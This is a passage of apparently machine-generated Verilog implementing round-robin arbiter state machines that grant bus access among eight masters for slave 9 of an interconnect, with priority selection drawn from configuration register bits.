                        s9_msel_arb0_next_state = s9_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s9_msel_arb0_req[6] ) 
                        begin
                            s9_msel_arb0_next_state = s9_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s9_msel_arb0_req[7] ) 
                            begin
                                s9_msel_arb0_next_state = s9_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s9_msel_arb0_req[0] ) 
                                begin
                                    s9_msel_arb0_next_state = s9_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb0_req[1] ) 
                                    begin
                                        s9_msel_arb0_next_state = s9_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb0_req[2] ) 
                                        begin
                                            s9_msel_arb0_next_state = s9_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb0_grant4:
        begin
            if (  !( s9_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s9_msel_arb0_req[5] ) 
                begin
                    s9_msel_arb0_next_state = s9_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s9_msel_arb0_req[6] ) 
                    begin
                        s9_msel_arb0_next_state = s9_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s9_msel_arb0_req[7] ) 
                        begin
                            s9_msel_arb0_next_state = s9_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s9_msel_arb0_req[0] ) 
                            begin
                                s9_msel_arb0_next_state = s9_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s9_msel_arb0_req[1] ) 
                                begin
                                    s9_msel_arb0_next_state = s9_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb0_req[2] ) 
                                    begin
                                        s9_msel_arb0_next_state = s9_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb0_req[3] ) 
                                        begin
                                            s9_msel_arb0_next_state = s9_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb0_grant5:
        begin
            if (  !( s9_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s9_msel_arb0_req[6] ) 
                begin
                    s9_msel_arb0_next_state = s9_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s9_msel_arb0_req[7] ) 
                    begin
                        s9_msel_arb0_next_state = s9_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s9_msel_arb0_req[0] ) 
                        begin
                            s9_msel_arb0_next_state = s9_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s9_msel_arb0_req[1] ) 
                            begin
                                s9_msel_arb0_next_state = s9_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s9_msel_arb0_req[2] ) 
                                begin
                                    s9_msel_arb0_next_state = s9_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb0_req[3] ) 
                                    begin
                                        s9_msel_arb0_next_state = s9_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb0_req[4] ) 
                                        begin
                                            s9_msel_arb0_next_state = s9_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb0_grant6:
        begin
            if (  !( s9_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s9_msel_arb0_req[7] ) 
                begin
                    s9_msel_arb0_next_state = s9_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s9_msel_arb0_req[0] ) 
                    begin
                        s9_msel_arb0_next_state = s9_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s9_msel_arb0_req[1] ) 
                        begin
                            s9_msel_arb0_next_state = s9_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s9_msel_arb0_req[2] ) 
                            begin
                                s9_msel_arb0_next_state = s9_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s9_msel_arb0_req[3] ) 
                                begin
                                    s9_msel_arb0_next_state = s9_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb0_req[4] ) 
                                    begin
                                        s9_msel_arb0_next_state = s9_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb0_req[5] ) 
                                        begin
                                            s9_msel_arb0_next_state = s9_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb0_grant7:
        begin
            if (  !( s9_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s9_msel_arb0_req[0] ) 
                begin
                    s9_msel_arb0_next_state = s9_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s9_msel_arb0_req[1] ) 
                    begin
                        s9_msel_arb0_next_state = s9_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s9_msel_arb0_req[2] ) 
                        begin
                            s9_msel_arb0_next_state = s9_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s9_msel_arb0_req[3] ) 
                            begin
                                s9_msel_arb0_next_state = s9_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s9_msel_arb0_req[4] ) 
                                begin
                                    s9_msel_arb0_next_state = s9_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb0_req[5] ) 
                                    begin
                                        s9_msel_arb0_next_state = s9_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb0_req[6] ) 
                                        begin
                                            s9_msel_arb0_next_state = s9_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s9_msel_arb1_req = { ( s9_msel_req[7] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'd1 ) ), ( s9_msel_req[6] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'd1 ) ), ( s9_msel_req[5] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'd1 ) ), ( s9_msel_req[4] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'd1 ) ), ( s9_msel_req[3] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'd1 ) ), ( s9_msel_req[2] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'd1 ) ), ( s9_msel_req[1] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'd1 ) ), ( s9_msel_req[0] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s9_msel_arb1_state <= s9_msel_arb1_grant0;
        end
        else
        begin 
            s9_msel_arb1_state <= s9_msel_arb1_next_state;
        end
    end
    always @ (  s9_msel_arb1_state or  { ( s9_msel_req[7] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'd1 ) ), ( s9_msel_req[6] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'd1 ) ), ( s9_msel_req[5] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'd1 ) ), ( s9_msel_req[4] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'd1 ) ), ( s9_msel_req[3] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'd1 ) ), ( s9_msel_req[2] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'd1 ) ), ( s9_msel_req[1] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'd1 ) ), ( s9_msel_req[0] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s9_msel_arb1_next_state = s9_msel_arb1_state;
        case ( s9_msel_arb1_state ) 
        s9_msel_arb1_grant0:
        begin
            if (  !( s9_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s9_msel_arb1_req[1] ) 
                begin
                    s9_msel_arb1_next_state = s9_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s9_msel_arb1_req[2] ) 
                    begin
                        s9_msel_arb1_next_state = s9_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s9_msel_arb1_req[3] ) 
                        begin
                            s9_msel_arb1_next_state = s9_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s9_msel_arb1_req[4] ) 
                            begin
                                s9_msel_arb1_next_state = s9_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s9_msel_arb1_req[5] ) 
                                begin
                                    s9_msel_arb1_next_state = s9_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb1_req[6] ) 
                                    begin
                                        s9_msel_arb1_next_state = s9_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb1_req[7] ) 
                                        begin
                                            s9_msel_arb1_next_state = s9_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb1_grant1:
        begin
            if (  !( s9_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s9_msel_arb1_req[2] ) 
                begin
                    s9_msel_arb1_next_state = s9_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s9_msel_arb1_req[3] ) 
                    begin
                        s9_msel_arb1_next_state = s9_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s9_msel_arb1_req[4] ) 
                        begin
                            s9_msel_arb1_next_state = s9_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s9_msel_arb1_req[5] ) 
                            begin
                                s9_msel_arb1_next_state = s9_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s9_msel_arb1_req[6] ) 
                                begin
                                    s9_msel_arb1_next_state = s9_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb1_req[7] ) 
                                    begin
                                        s9_msel_arb1_next_state = s9_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb1_req[0] ) 
                                        begin
                                            s9_msel_arb1_next_state = s9_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb1_grant2:
        begin
            if (  !( s9_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s9_msel_arb1_req[3] ) 
                begin
                    s9_msel_arb1_next_state = s9_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s9_msel_arb1_req[4] ) 
                    begin
                        s9_msel_arb1_next_state = s9_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s9_msel_arb1_req[5] ) 
                        begin
                            s9_msel_arb1_next_state = s9_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s9_msel_arb1_req[6] ) 
                            begin
                                s9_msel_arb1_next_state = s9_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s9_msel_arb1_req[7] ) 
                                begin
                                    s9_msel_arb1_next_state = s9_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb1_req[0] ) 
                                    begin
                                        s9_msel_arb1_next_state = s9_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb1_req[1] ) 
                                        begin
                                            s9_msel_arb1_next_state = s9_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb1_grant3:
        begin
            if (  !( s9_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s9_msel_arb1_req[4] ) 
                begin
                    s9_msel_arb1_next_state = s9_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s9_msel_arb1_req[5] ) 
                    begin
                        s9_msel_arb1_next_state = s9_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s9_msel_arb1_req[6] ) 
                        begin
                            s9_msel_arb1_next_state = s9_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s9_msel_arb1_req[7] ) 
                            begin
                                s9_msel_arb1_next_state = s9_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s9_msel_arb1_req[0] ) 
                                begin
                                    s9_msel_arb1_next_state = s9_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb1_req[1] ) 
                                    begin
                                        s9_msel_arb1_next_state = s9_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb1_req[2] ) 
                                        begin
                                            s9_msel_arb1_next_state = s9_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb1_grant4:
        begin
            if (  !( s9_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s9_msel_arb1_req[5] ) 
                begin
                    s9_msel_arb1_next_state = s9_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s9_msel_arb1_req[6] ) 
                    begin
                        s9_msel_arb1_next_state = s9_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s9_msel_arb1_req[7] ) 
                        begin
                            s9_msel_arb1_next_state = s9_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s9_msel_arb1_req[0] ) 
                            begin
                                s9_msel_arb1_next_state = s9_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s9_msel_arb1_req[1] ) 
                                begin
                                    s9_msel_arb1_next_state = s9_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb1_req[2] ) 
                                    begin
                                        s9_msel_arb1_next_state = s9_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb1_req[3] ) 
                                        begin
                                            s9_msel_arb1_next_state = s9_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb1_grant5:
        begin
            if (  !( s9_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s9_msel_arb1_req[6] ) 
                begin
                    s9_msel_arb1_next_state = s9_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s9_msel_arb1_req[7] ) 
                    begin
                        s9_msel_arb1_next_state = s9_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s9_msel_arb1_req[0] ) 
                        begin
                            s9_msel_arb1_next_state = s9_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s9_msel_arb1_req[1] ) 
                            begin
                                s9_msel_arb1_next_state = s9_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s9_msel_arb1_req[2] ) 
                                begin
                                    s9_msel_arb1_next_state = s9_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb1_req[3] ) 
                                    begin
                                        s9_msel_arb1_next_state = s9_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb1_req[4] ) 
                                        begin
                                            s9_msel_arb1_next_state = s9_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb1_grant6:
        begin
            if (  !( s9_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s9_msel_arb1_req[7] ) 
                begin
                    s9_msel_arb1_next_state = s9_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s9_msel_arb1_req[0] ) 
                    begin
                        s9_msel_arb1_next_state = s9_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s9_msel_arb1_req[1] ) 
                        begin
                            s9_msel_arb1_next_state = s9_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s9_msel_arb1_req[2] ) 
                            begin
                                s9_msel_arb1_next_state = s9_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s9_msel_arb1_req[3] ) 
                                begin
                                    s9_msel_arb1_next_state = s9_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb1_req[4] ) 
                                    begin
                                        s9_msel_arb1_next_state = s9_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb1_req[5] ) 
                                        begin
                                            s9_msel_arb1_next_state = s9_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb1_grant7:
        begin
            if (  !( s9_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s9_msel_arb1_req[0] ) 
                begin
                    s9_msel_arb1_next_state = s9_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s9_msel_arb1_req[1] ) 
                    begin
                        s9_msel_arb1_next_state = s9_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s9_msel_arb1_req[2] ) 
                        begin
                            s9_msel_arb1_next_state = s9_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s9_msel_arb1_req[3] ) 
                            begin
                                s9_msel_arb1_next_state = s9_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s9_msel_arb1_req[4] ) 
                                begin
                                    s9_msel_arb1_next_state = s9_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb1_req[5] ) 
                                    begin
                                        s9_msel_arb1_next_state = s9_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb1_req[6] ) 
                                        begin
                                            s9_msel_arb1_next_state = s9_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s9_msel_arb2_req = { ( s9_msel_req[7] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'd2 ) ), ( s9_msel_req[6] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'd2 ) ), ( s9_msel_req[5] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'd2 ) ), ( s9_msel_req[4] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'd2 ) ), ( s9_msel_req[3] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'd2 ) ), ( s9_msel_req[2] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'd2 ) ), ( s9_msel_req[1] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'd2 ) ), ( s9_msel_req[0] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s9_msel_arb2_state <= s9_msel_arb2_grant0;
        end
        else
        begin 
            s9_msel_arb2_state <= s9_msel_arb2_next_state;
        end
    end
    always @ (  s9_msel_arb2_state or  { ( s9_msel_req[7] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'd2 ) ), ( s9_msel_req[6] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'd2 ) ), ( s9_msel_req[5] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'd2 ) ), ( s9_msel_req[4] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'd2 ) ), ( s9_msel_req[3] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'd2 ) ), ( s9_msel_req[2] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'd2 ) ), ( s9_msel_req[1] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'd2 ) ), ( s9_msel_req[0] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s9_msel_arb2_next_state = s9_msel_arb2_state;
        case ( s9_msel_arb2_state ) 
        s9_msel_arb2_grant0:
        begin
            if (  !( s9_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s9_msel_arb2_req[1] ) 
                begin
                    s9_msel_arb2_next_state = s9_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s9_msel_arb2_req[2] ) 
                    begin
                        s9_msel_arb2_next_state = s9_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s9_msel_arb2_req[3] ) 
                        begin
                            s9_msel_arb2_next_state = s9_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s9_msel_arb2_req[4] ) 
                            begin
                                s9_msel_arb2_next_state = s9_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s9_msel_arb2_req[5] ) 
                                begin
                                    s9_msel_arb2_next_state = s9_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb2_req[6] ) 
                                    begin
                                        s9_msel_arb2_next_state = s9_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb2_req[7] ) 
                                        begin
                                            s9_msel_arb2_next_state = s9_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb2_grant1:
        begin
            if (  !( s9_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s9_msel_arb2_req[2] ) 
                begin
                    s9_msel_arb2_next_state = s9_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s9_msel_arb2_req[3] ) 
                    begin
                        s9_msel_arb2_next_state = s9_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s9_msel_arb2_req[4] ) 
                        begin
                            s9_msel_arb2_next_state = s9_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s9_msel_arb2_req[5] ) 
                            begin
                                s9_msel_arb2_next_state = s9_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s9_msel_arb2_req[6] ) 
                                begin
                                    s9_msel_arb2_next_state = s9_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb2_req[7] ) 
                                    begin
                                        s9_msel_arb2_next_state = s9_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb2_req[0] ) 
                                        begin
                                            s9_msel_arb2_next_state = s9_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb2_grant2:
        begin
            if (  !( s9_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s9_msel_arb2_req[3] ) 
                begin
                    s9_msel_arb2_next_state = s9_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s9_msel_arb2_req[4] ) 
                    begin
                        s9_msel_arb2_next_state = s9_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s9_msel_arb2_req[5] ) 
                        begin
                            s9_msel_arb2_next_state = s9_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s9_msel_arb2_req[6] ) 
                            begin
                                s9_msel_arb2_next_state = s9_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s9_msel_arb2_req[7] ) 
                                begin
                                    s9_msel_arb2_next_state = s9_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb2_req[0] ) 
                                    begin
                                        s9_msel_arb2_next_state = s9_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb2_req[1] ) 
                                        begin
                                            s9_msel_arb2_next_state = s9_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb2_grant3:
        begin
            if (  !( s9_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s9_msel_arb2_req[4] ) 
                begin
                    s9_msel_arb2_next_state = s9_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s9_msel_arb2_req[5] ) 
                    begin
                        s9_msel_arb2_next_state = s9_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s9_msel_arb2_req[6] ) 
                        begin
                            s9_msel_arb2_next_state = s9_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s9_msel_arb2_req[7] ) 
                            begin
                                s9_msel_arb2_next_state = s9_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s9_msel_arb2_req[0] ) 
                                begin
                                    s9_msel_arb2_next_state = s9_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb2_req[1] ) 
                                    begin
                                        s9_msel_arb2_next_state = s9_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb2_req[2] ) 
                                        begin
                                            s9_msel_arb2_next_state = s9_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb2_grant4:
        begin
            if (  !( s9_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s9_msel_arb2_req[5] ) 
                begin
                    s9_msel_arb2_next_state = s9_msel_arb2_grant5;
                end
                else
                begin 
